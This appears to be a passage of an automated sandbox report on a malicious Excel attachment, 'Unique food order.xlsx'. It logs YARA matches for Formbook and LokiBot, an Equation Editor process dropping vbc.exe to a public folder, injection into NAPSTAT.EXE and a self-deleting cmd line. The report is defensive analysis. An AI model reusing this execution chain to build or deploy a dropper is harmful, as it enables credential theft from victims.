      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020C23059_2_020C2305
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020C73539_2_020C7353
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0210A37B9_2_0210A37B
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_021663BF9_2_021663BF
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020BF3CF9_2_020BF3CF
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020E63DB9_2_020E63DB
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020ED0059_2_020ED005
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020C30409_2_020C3040
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020D905A9_2_020D905A
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020BE0C69_2_020BE0C6
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0210A6349_2_0210A634
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_021626229_2_02162622
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020C46809_2_020C4680
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020CE6C19_2_020CE6C1
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0214579A9_2_0214579A
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020CC7BC9_2_020CC7BC
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020F57C39_2_020F57C3
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0214443E9_2_0214443E
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020FD47D9_2_020FD47D
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020D14899_2_020D1489
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020F54859_2_020F5485
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020C351F9_2_020C351F
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_021065409_2_02106540
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020DC5F09_2_020DC5F0
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_02173A839_2_02173A83
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020E7B009_2_020E7B00
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0216CBA49_2_0216CBA4
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0214DBDA9_2_0214DBDA
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020BFBD79_2_020BFBD7
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020CC85C9_2_020CC85C
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020E286D9_2_020E286D
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0215F8EE9_2_0215F8EE
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_021459559_2_02145955
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0214394B9_2_0214394B
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0216098E9_2_0216098E
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020C29B29_2_020C29B2
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020D69FE9_2_020D69FE
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020F2E2F9_2_020F2E2F
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020DEE4C9_2_020DEE4C
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020D0F3F9_2_020D0F3F
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020EDF7C9_2_020EDF7C
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0215CFB19_2_0215CFB1
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_02132FDC9_2_02132FDC
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020F0D3B9_2_020F0D3B
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020CCD5B9_2_020CCD5B
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0215FDDD9_2_0215FDDD
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0009E5ED9_2_0009E5ED
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0009D7819_2_0009D781
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00082D909_2_00082D90
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00089E2C9_2_00089E2C
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00089E309_2_00089E30
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0009DE559_2_0009DE55
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0009DF6E9_2_0009DF6E
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0009CF939_2_0009CF93
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00082FB09_2_00082FB0
      Source: Unique food order.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
      Source: Unique food order.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
      Source: C:\Users\Public\vbc.exeCode function: String function: 1E99E2A8 appears 34 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 1EA0F970 appears 77 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 1E9E373B appears 237 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 1E9E3F92 appears 99 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 1E99DF5C appears 100 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 1E99E2A8 appears 34 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 1EA0F970 appears 77 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 1E9E373B appears 237 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 1E9E3F92 appears 99 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 1E99DF5C appears 100 times
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 020BE2A8 appears 38 times
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 0212F970 appears 84 times
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 02103F92 appears 132 times
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 0210373B appears 245 times
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 020BDF5C appears 119 times
      Source: svchost[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: svchost[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000009.00000002.2382070172.0000000000553000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000009.00000002.2382070172.0000000000553000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@10/3@1/1
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Unique food order.xlsxJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Unique food order.xlsxJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR80B.tmpJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR80B.tmpJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ................................C.:.\.U.s.e.r.s.\.P.u.b.l.i.c.\.v.b.c...e.x.e................... .......................2.........*.......*.....Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ......................*.........A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........P$Ys..............*.............................&.................*.....Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ................................C.:.\.U.s.e.r.s.\.P.u.b.l.i.c.\.v.b.c...e.x.e................... .......................2.........*.......*.....Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ......................*.........A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........P$Ys..............*.............................&.................*.....Jump to behavior
      Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
      Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Unique food order.xlsxVirustotal: Detection: 24%
      Source: Unique food order.xlsxReversingLabs: Detection: 22%
      Source: Unique food order.xlsxVirustotal: Detection: 24%
      Source: Unique food order.xlsxReversingLabs: Detection: 22%
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: unknownProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
      Source: unknownProcess created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
      Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'Jump to behavior
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: unknownProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
      Source: unknownProcess created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
      Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'Jump to behavior
      Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32Jump to behavior
      Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
      Source: Unique food order.xlsxStatic file information: File size 2303488 > 1048576
      Source: Unique food order.xlsxStatic file information: File size 2303488 > 1048576
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: Binary string: wntdll.pdb source: vbc.exe, NAPSTAT.EXE
      Source: Binary string: napstat.pdb source: vbc.exe, 00000005.00000002.2360415056.0000000000090000.00000004.00000001.sdmp
      Source: Binary string: wntdll.pdb source: vbc.exe, NAPSTAT.EXE
      Source: Binary string: napstat.pdb source: vbc.exe, 00000005.00000002.2360415056.0000000000090000.00000004.00000001.sdmp
      Source: Unique food order.xlsxInitial sample: OLE indicators vbamacros = False
      Source: Unique food order.xlsxInitial sample: OLE indicators vbamacros = False
      Source: Unique food order.xlsxInitial sample: OLE indicators encrypted = True
      Source: Unique food order.xlsxInitial sample: OLE indicators encrypted = True

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2692, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2868, type: MEMORY
      Yara detected VB6 Downloader GenericShow sources
      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2692, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2868, type: MEMORY
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0040984F push ecx; retf 4_2_004098B0
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00409D50 push edi; ret 4_2_00409D5D
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00409D55 push edi; ret 4_2_00409D5D
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00406910 pushad ; iretd 4_2_00406914
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004069F5 push EF15CAC2h; ret 4_2_00406A05
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0040759B push FFFFFFC6h; ret 4_2_004075A2
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00406653 pushad ; iretd 4_2_00406654
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00406A98 pushfd ; ret 4_2_00406A9A
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004082AF push FFFFFFDAh; ret 4_2_004082B2
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0040A3DA push ecx; retf 4_2_0040A3DC
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00407FAA push esp; ret 4_2_00407FB1
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00407FB3 push ecx; retf 4_2_00407FBC
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0040984F push ecx; retf 4_2_004098B0
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00409D50 push edi; ret 4_2_00409D5D
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00409D55 push edi; ret 4_2_00409D5D
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00406910 pushad ; iretd 4_2_00406914
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004069F5 push EF15CAC2h; ret 4_2_00406A05
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0040759B push FFFFFFC6h; ret 4_2_004075A2
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00406653 pushad ; iretd 4_2_00406654
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00406A98 pushfd ; ret 4_2_00406A9A
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004082AF push FFFFFFDAh; ret 4_2_004082B2
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0040A3DA push ecx; retf 4_2_0040A3DC
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00407FAA push esp; ret 4_2_00407FB1
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00407FB3 push ecx; retf 4_2_00407FBC
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E99DFA1 push ecx; ret 5_2_1E99DFB4
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020BDFA1 push ecx; ret 9_2_020BDFB4
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_000969BB push esi; ret 9_2_000969BC
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0008AB07 push ds; retf 9_2_0008AB09
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00094E05 push ss; retf 9_2_00094E06
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0009CEA5 push eax; ret 9_2_0009CEF8
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0009CEFB push eax; ret 9_2_0009CF62
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0009CEF2 push eax; ret 9_2_0009CEF8
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0009CF5C push eax; ret 9_2_0009CF62
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

      Boot Survival:

      barindex
      Drops PE files to the user root directoryShow sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
